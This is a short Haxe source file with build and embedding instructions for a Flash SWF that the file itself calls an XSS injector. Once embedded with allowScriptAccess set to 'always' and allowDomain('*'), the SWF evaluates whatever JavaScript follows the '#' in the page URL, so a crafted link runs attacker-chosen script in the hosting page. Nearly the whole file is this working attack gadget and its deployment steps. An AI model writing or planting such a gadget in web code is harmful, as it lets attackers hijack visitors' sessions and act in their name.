Xss.hx

   1 // xss.hx
   2 //
   3 // Purpose:
   4 //    This haxe source file builds a SWF which injects JavaScript into the including page.
   5 //
   6 // To build:
   7 //   1. Acquire the latest stable version of haxe from http://haxe.org/download
   8 //      Note: To run haxe, you may also need Neko (http://nekovm.org/download)
   9 //   2. Create a file called xss.hx with these contents.
  10 //   3. Create a file called compile.hxml with the following content:
  11 //      -swf-version 9
  12 //      -swf xss.swf
  13 //      -main xss
  14 //   4. From the command line, execute:
  15 //      haxe compile.hxml
  16 //
  17 // To activate:
  18 //   1. Take xss.swf generated by haxe and deploy it to your webserver.
  19 //   2. Embed it into your HTML file with code like the following:
  20 //      <object
  21 //          id="xss" class="hidden"
  22 //          classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
  23 //          codebase="http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0">
  24 //          <param name="movie" value="xss.swf" />
  25 //          <param name="allowScriptAccess" value="always" />
  26 //          <embed
  27 //              class="hidden"
  28 //              src="xss.swf"
  29 //              allowScriptAccess="always"
  30 //              type="application/x-shockwave-flash"
  31 //              pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">
  32 //          </embed>
  33 //      </object>
  34 //
  35
  36 import flash.external.ExternalInterface;
  37
  38 class Xss {
  39
  40     public static function main() {
  41         flash.system.Security.allowDomain("*");
  42         ExternalInterface.call( [ "(function(){setTimeout(\"",
  43             "eval(document.location.hash.slice(1))",
  44         "\",0);})" ].join('') );
  45     }
  46
  47 }